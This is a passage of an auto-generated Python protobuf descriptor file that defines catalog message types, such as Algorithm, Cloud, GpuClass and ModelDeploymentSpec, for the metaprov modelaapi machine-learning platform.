\x01(\x0b\x32..k8s.io.apimachinery.pkg.apis.meta.v1.ListMeta\x12M\n\x05items\x18\x02 \x03(\x0b\x32>.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Cloud\"\xec\x02\n\tCloudSpec\x12\x19\n\x11\x64\x65\x66\x61ultRegionName\x18\x01 \x01(\t\x12\x1f\n\x17\x64\x65\x66\x61ultMachineClassName\x18\x02 \x01(\t\x12\x1b\n\x13\x64\x65\x66\x61ultGpuClassName\x18\x03 \x01(\t\x12]\n\x0emachineClasses\x18\x04 \x03(\x0b\x32\x45.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MachineClass\x12U\n\ngpuClasses\x18\x05 \x03(\x0b\x32\x41.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GpuClass\x12P\n\x07regions\x18\x06 \x03(\x0b\x32?.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Region\"\xc7\x01\n\x0b\x43loudStatus\x12_\n\x0cmachineCosts\x18\x01 \x03(\x0b\x32I.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MachineClassCost\x12W\n\x08gpuCosts\x18\x02 \x03(\x0b\x32\x45.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GpuClassCost\"A\n\x0c\x43ompilerSpec\x12\x0e\n\x06\x65nable\x18\x01 \x01(\x08\x12\x10\n\x08\x63ompiler\x18\x02 \x01(\t\x12\x0f\n\x07targets\x18\x03 \x03(\t\"l\n\x0f\x43onfusionMatrix\x12Y\n\x04rows\x18\x01 \x03(\x0b\x32K.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ConfusionMatrixRow\"F\n\x12\x43onfusionMatrixRow\x12\t\n\x01t\x18\x01 \x01(\t\x12\t\n\x01p\x18\x02 \x01(\t\x12\r\n\x05\x63ount\x18\x03 \x01(\x05\x12\x0b\n\x03pct\x18\x04 \x01(\x01\"\"\n\nCurvePoint\x12\t\n\x01x\x18\x01 \x01(\x01\x12\t\n\x01y\x18\x02 \x01(\x01\"(\n\nDataCenter\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0c\n\x04\x63ode\x18\x02 \x01(\t\"[\n\x0e\x46loatParameter\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0b\n\x03min\x18\x03 \x01(\x01\x12\x0b\n\x03max\x18\x04 \x01(\x01\x12\x14\n\x0c\x64\x65\x66\x61ultValue\x18\x05 \x01(\x01\x12\x0b\n\x03log\x18\x06 \x01(\x08\"t\n\x0cGithubEvents\x12\x19\n\x11gitConnectionName\x18\x01 \x01(\t\x12\x12\n\nrepository\x18\x02 \x01(\t\x12\x0e\n\x06\x62ranch\x18\x03 \x01(\t\x12\x15\n\rblobNameRegex\x18\x04 \x01(\t\x12\x0e\n\x06\x65vents\x18\x05 \x03(\t\"z\n\x08GpuClass\x12\x0c\n\x04\x63ode\x18\x01 \x01(\t\x12\x12\n\nregionName\x18\x02 \x01(\t\x12\x0c\n\x04vcpu\x18\x03 \x01(\x05\x12>\n\x06gpumem\x18\x04 \x01(\x0b\x32..k8s.io.apimachinery.pkg.api.resource.Quantity\"\xb5\x01\n\x0cGpuClassCost\x12\x0c\n\x04\x63ode\x18\x01 \x01(\t\x12\x0e\n\x06region\x18\x02 \x01(\t\x12\x45\n\rcostPerMinute\x18\x03 \x01(\x0b\x32..k8s.io.apimachinery.pkg.api.resource.Quantity\x12@\n\x08\x63ostSpot\x18\x04 \x01(\x0b\x32..k8s.io.apimachinery.pkg.api.resource.Quantity\"Z\n\x0cIntParameter\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0c\n\x04type\x18\x02 \x01(\t\x12\x0b\n\x03min\x18\x03 \x01(\x05\x12\x0b\n\x03max\x18\x04 \x01(\x05\x12\x14\n\x0c\x64\x65\x66\x61ultValue\x18\x06 \x01(\x05\"*\n\x03Lib\x12\x12\n\nframeworks\x18\x01 \x01(\t\x12\x0f\n\x07version\x18\x02 \x01(\t\")\n\x04Logs\x12\x12\n\nbucketName\x18\x01 \x01(\t\x12\r\n\x05paths\x18\x02 \x03(\t\"\xa9\x01\n\x0bMLFramework\x12\x42\n\x08metadata\x18\x01 \x01(\x0b\x32\x30.k8s.io.apimachinery.pkg.apis.meta.v1.ObjectMeta\x12V\n\x04spec\x18\x02 \x01(\x0b\x32H.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MLFrameworkSpec\"\xa8\x01\n\x0fMLFrameworkList\x12@\n\x08metadata\x18\x01 \x01(\x0b\x32..k8s.io.apimachinery.pkg.apis.meta.v1.ListMeta\x12S\n\x05items\x18\x02 \x03(\x0b\x32\x44.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MLFramework\"R\n\x0fMLFrameworkSpec\x12\x0b\n\x03url\x18\x01 \x01(\t\x12\x13\n\x0b\x64\x65scription\x18\x02 \x01(\t\x12\x0f\n\x07version\x18\x03 \x01(\t\x12\x0c\n\x04lang\x18\x04 \x01(\t\"\x8c\x01\n\x0cMachineClass\x12\x0c\n\x04\x63ode\x18\x01 \x01(\t\x12\x12\n\nregionName\x18\x02 \x01(\t\x12;\n\x03mem\x18\x03 \x01(\x0b\x32..k8s.io.apimachinery.pkg.api.resource.Quantity\x12\x0c\n\x04vcpu\x18\x04 \x01(\x05\x12\x0f\n\x07storage\x18\x05 \x01(\t\"\xb9\x01\n\x10MachineClassCost\x12\x0c\n\x04\x63ode\x18\x01 \x01(\t\x12\x0e\n\x06region\x18\x02 \x01(\t\x12\x45\n\rcostPerMinute\x18\x03 \x01(\x0b\x32..k8s.io.apimachinery.pkg.api.resource.Quantity\x12@\n\x08\x63ostSpot\x18\x04 \x01(\x0b\x32..k8s.io.apimachinery.pkg.api.resource.Quantity\",\n\x0bMeasurement\x12\x0e\n\x06metric\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\x01\"\xe9\x01\n\x13ModelDeploymentSpec\x12\x11\n\tmodelName\x18\x01 \x01(\t\x12\x14\n\x0cmodelVersion\x18\x02 \x01(\t\x12\x12\n\nmaxTraffic\x18\x03 \x01(\x05\x12\x0f\n\x07traffic\x18\x04 \x01(\x05\x12\x0e\n\x06\x63\x61nary\x18\x05 \x01(\x08\x12\x0e\n\x06shadow\x18\x06 \x01(\x08\x12\x10\n\x08released\x18\x07 \x01(\x08\x12\x10\n\x08\x64\x65ployed\x18\x08 \x01(\x08\x12\x10\n\x08mountTar\x18\t \x01(\x08\x12\x17\n\x0ftrafficSelector\x18\n \x01(\t\x12\x15\n\rcanaryMetrics\x18\x0b \x03(\t\"\xcf\x04\n\x15ModelDeploymentStatus\x12\x11\n\timageName\x18\x01 \x01(\t\x12:\n\rdeploymentRef\x18\x02 \x01(\x0b\x32#.k8s.io.api.core.v1.ObjectReference\x12\x37\n\nserviceRef\x18\x03 \x01(\x0b\x32#.k8s.io.api.core.v1.ObjectReference\x12\x0f\n\x07hpaName\x18\x04 \x01(\t\x12\x11\n\tcurrent95\x18\x05 \x01(\x01\x12\x11\n\tcurrent99\x18\x06 \x01(\x01\x12\x46\n\x12lastPredictionTime\x18\x07 \x01(\x0b\x32*.k8s.io.apimachinery.pkg.apis.meta.v1.Time\x12\x1a\n\x12\x64\x61ilyPredictionAvg\x18\x08 \x01(\x05\x12\x13\n\x0blastFailure\x18\t \x01(\t\x12\r\n\x05phase\x18\n \x01(\t\x12>\n\ndeployedAt\x18\x0b \x01(\x0b\x32*.k8s.io.apimachinery.pkg.apis.meta.v1.Time\x12>\n\nreleasedAt\x18\x0c \x01(\x0b\x32*.k8s.io.apimachinery.pkg.apis.meta.v1.Time\x12\x1b\n\x13trainingDatasetName\x18\r \x01(\t\x12\x12\n\napprovedBy\x18\x0e \x01(\t\x12>\n\napprovedAt\x18\x0f \x01(\x0b\x32*.k8s.io.apimachinery.pkg.apis.meta.v1.Time\"\x8e\x02\n\x10NotificationSpec\x12\x0f\n\x07onError\x18\x01 \x01(\x08\x12\x10\n\x08\x65rrorTTL\x18\x02 \x01(\x05\x12\x11\n\tonSuccess\x18\x03 \x01(\x08\x12\x12\n\nsuccessTTL\x18\x04 \x01(\x05\x12\x14\n\x0cnotifierName\x18\x05 \x01(\t\x12i\n\x08selector\x18\x06 \x03(\x0b\x32W.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.NotificationSpec.SelectorEntry\x1a/\n\rSelectorEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\"^\n\x07PRCurve\x12S\n\x06values\x18\x01 \x03(\x0b\x32\x43.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CurvePoint\"\xb1\x01\n\x0fPretrainedModel\x12\x42\n\x08metadata\x18\x01 \x01(\x0b\x32\x30.k8s.io.apimachinery.pkg.apis.meta.v1.ObjectMeta\x12Z\n\x04spec\x18\x02 \x01(\x0b\x32L.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PretrainedModelSpec\"\xb0\x01\n\x13PretrainedModelList\x12@\n\x08metadata\x18\x01 \x01(\x0b\x32..k8s.io.apimachinery.pkg.apis.meta.v1.ListMeta\x12W\n\x05items\x18\x02 \x03(\x0b\x32H.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PretrainedModel\"$\n\x13PretrainedModelSpec\x12\r\n\x05image\x18\x01 \x01(\t\"\xad\x01\n\rPublicDataset\x12\x42\n\x08metadata\x18\x01 \x01(\x0b\x32\x30.k8s.io.apimachinery.pkg.apis.meta.v1.ObjectMeta\x12X\n\x04spec\x18\x02 \x01(\x0b\x32J.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec\"\xac\x01\n\x11PublicDatasetList\x12@\n\x08metadata\x18\x01 \x01(\x0b\x32..k8s.io.apimachinery.pkg.apis.meta.v1.ListMeta\x12U\n\x05items\x18\x02 \x03(\x0b\x32\x46.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDataset\"\xb6\x02\n\x11PublicDatasetSpec\x12\x0b\n\x03url\x18\x01 \x01(\t\x12\x13\n\x0b\x64\x65scription\x18\x02 \x01(\t\x12\x0c\n\x04task\x18\x03 \x01(\t\x12\x10\n\x08openmlID\x18\x04 \x01(\t\x12\x0f\n\x07\x64\x61taUrl\x18\x05 \x01(\t\x12\x10\n\x08\x63itation\x18\x06 \x01(\t\x12\x0c\n\x04rows\x18\x07 \x01(\x05\x12\x0f\n\x07\x63olumns\x18\x08 \x01(\x05\x12\x10\n\x08\x66ileSize\x18\t \x01(\x05\x12\x14\n\x0ctargetColumn\x18\n \x01(\t\x12\x10\n\x08industry\x18\x0b \x01(\t\x12\x12\n\nimbalanced\x18\x0c \x01(\x08\x12\x14\n\x0c\x64\x61tasourceCR\x18\r \x01(\t\x12\x11\n\tdatasetCR\x18\x0e \x01(\t\x12\x0f\n\x07studyCR\x18\x0f \x01(\t\x12\x15\n\rdataProductCR\x18\x10 \x01(\t\"\xb6\x01\n\x06Region\x12\x0c\n\x04\x63ode\x18\x01 \x01(\t\x12\x1d\n\x15\x64\x65\x66\x61ultDatacenterName\x18\x02 \x01(\t\x12\x10\n\x08location\x18\x03 \x01(\t\x12\x13\n\x0b\x62illingCode\x18\x04 \x01(\t\x12X\n\x0b\x64\x61tacenters\x18\x05 \x03(\x0b\x32\x43.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.DataCenter\"y\n\x0cResourceSpec\x12\x19\n\x11workloadClassName\x18\x01 \x01(\t\x12\x0e\n\x06\x65nable\x18\x02 \x01(\x08\x12>\n\x0crequirements\x18\x03 \x01(\x0b\x32(.k8s.io.api.core.v1.ResourceRequirements\"b\n\x0bRocAucCurve\x12S\n\x06values\x18\x01 \x03(\x0b\x32\x43.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CurvePoint\"\xbb\x01\n\x0bRunSchedule\x12\x0f\n\x07\x65nabled\x18\x01 \x01(\x08\x12=\n\tstartTime\x18\x02 \x01(\x0b\x32*.k8s.io.apimachinery.pkg.apis.meta.v1.Time\x12@\n\x07\x65ndTime\x18\x03 \x01(\x0b\x32/.k8s.io.apimachinery.pkg.apis.meta.v1.Timestamp\x12\x0c\n\x04\x63ron\x18\x04 \x01(\t\x12\x0c\n\x04type\x18\x05 \x01(\t\"1\n\x0bStakeHolder\x12\x13\n\x0b\x61\x63\x63ountName\x18\x01 \x01(\t\x12\r\n\x05roles\x18\x02 \x03(\t\"\xad\x01\n\rUserRoleClass\x12\x42\n\x08metadata\x18\x01 \x01(\x0b\x32\x30.k8s.io.apimachinery.pkg.apis.meta.v1.ObjectMeta\x12X\n\x04spec\x18\x02 \x01(\x0b\x32J.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.UserRoleClassSpec\"\xac\x01\n\x11UserRoleClassList\x12@\n\x08metadata\x18\x01 \x01(\x0b\x32..k8s.io.apimachinery.pkg.apis.meta.v1.ListMeta\x12U\n\x05items\x18\x02 \x03(\x0b\x32\x46.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.UserRoleClass\"B\n\x11UserRoleClassSpec\x12-\n\x05rules\x18\x01 \x03(\x0b\x32\x1e.k8s.io.api.rbac.v1.PolicyRule\"#\n\x06VizUri\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0b\n\x03uri\x18\x02 \x01(\t\"\xad\x01\n\rWorkloadClass\x12\x42\n\x08metadata\x18\x01 \x01(\x0b\x32\x30.k8s.io.apimachinery.pkg.apis.meta.v1.ObjectMeta\x12X\n\x04spec\x18\x02 \x01(\x0b\x32J.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.WorkloadClassSpec\"\xac\x01\n\x11WorkloadClassList\x12@\n\x08metadata\x18\x01 \x01(\x0b\x32..k8s.io.apimachinery.pkg.apis.meta.v1.ListMeta\x12U\n\x05items\x18\x02 \x03(\x0b\x32\x46.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.WorkloadClass\"\xf4\x01\n\x11WorkloadClassSpec\x12`\n\x11resourcesTemplate\x18\x01 \x01(\x0b\x32\x45.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ResourceSpec\x12\x12\n\nframeworks\x18\x03 \x03(\t\x12J\n\x04libs\x18\x04 \x03(\x0b\x32<.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Lib\x12\n\n\x02os\x18\x05 \x01(\t\x12\x11\n\tosVersion\x18\x06 \x01(\tB9Z7github.com/metaprov/modelaapi/pkg/apis/catalog/v1alpha1'
,
dependencies=[k8s_dot_io_dot_api_dot_core_dot_v1_dot_generated__pb2.DESCRIPTOR,k8s_dot_io_dot_api_dot_rbac_dot_v1_dot_generated__pb2.DESCRIPTOR,k8s_dot_io_dot_apimachinery_dot_pkg_dot_api_dot_resource_dot_generated__pb2.DESCRIPTOR,k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2.DESCRIPTOR,k8s_dot_io_dot_apimachinery_dot_pkg_dot_runtime_dot_generated__pb2.DESCRIPTOR,k8s_dot_io_dot_apimachinery_dot_pkg_dot_runtime_dot_schema_dot_generated__pb2.DESCRIPTOR,])
_ALGORITHM = _descriptor.Descriptor(
name='Algorithm',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Algorithm',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='metadata', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Algorithm.metadata', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='spec', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Algorithm.spec', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=418,
serialized_end=583,
)
_ALGORITHMLIST = _descriptor.Descriptor(
name='AlgorithmList',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.AlgorithmList',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='metadata', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.AlgorithmList.metadata', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='items', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.AlgorithmList.items', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=586,
serialized_end=750,
)
_ALGORITHMSPEC = _descriptor.Descriptor(
name='AlgorithmSpec',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.AlgorithmSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='frameworkName', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.AlgorithmSpec.frameworkName', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='description', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.AlgorithmSpec.description', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='url', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.AlgorithmSpec.url', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='task', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.AlgorithmSpec.task', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='sparse', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.AlgorithmSpec.sparse', index=4,
number=5, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='integerParameters', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.AlgorithmSpec.integerParameters', index=5,
number=6, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='floatParameters', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.AlgorithmSpec.floatParameters', index=6,
number=7, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='categoricalParameters', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.AlgorithmSpec.categoricalParameters', index=7,
number=8, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=753,
serialized_end=1161,
)
_CATEGORICALPARAMETER = _descriptor.Descriptor(
name='CategoricalParameter',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CategoricalParameter',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CategoricalParameter.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='defaultValue', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CategoricalParameter.defaultValue', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enums', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CategoricalParameter.enums', index=2,
number=3, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=1163,
serialized_end=1236,
)
_CLOUD = _descriptor.Descriptor(
name='Cloud',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Cloud',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='metadata', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Cloud.metadata', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='spec', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Cloud.spec', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='status', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Cloud.status', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=1239,
serialized_end=1482,
)
_CLOUDLIST = _descriptor.Descriptor(
name='CloudList',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudList',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='metadata', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudList.metadata', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='items', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudList.items', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=1485,
serialized_end=1641,
)
_CLOUDSPEC = _descriptor.Descriptor(
name='CloudSpec',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='defaultRegionName', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudSpec.defaultRegionName', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='defaultMachineClassName', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudSpec.defaultMachineClassName', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='defaultGpuClassName', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudSpec.defaultGpuClassName', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='machineClasses', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudSpec.machineClasses', index=3,
number=4, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='gpuClasses', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudSpec.gpuClasses', index=4,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='regions', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudSpec.regions', index=5,
number=6, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=1644,
serialized_end=2008,
)
_CLOUDSTATUS = _descriptor.Descriptor(
name='CloudStatus',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudStatus',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='machineCosts', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudStatus.machineCosts', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='gpuCosts', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudStatus.gpuCosts', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2011,
serialized_end=2210,
)
_COMPILERSPEC = _descriptor.Descriptor(
name='CompilerSpec',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CompilerSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
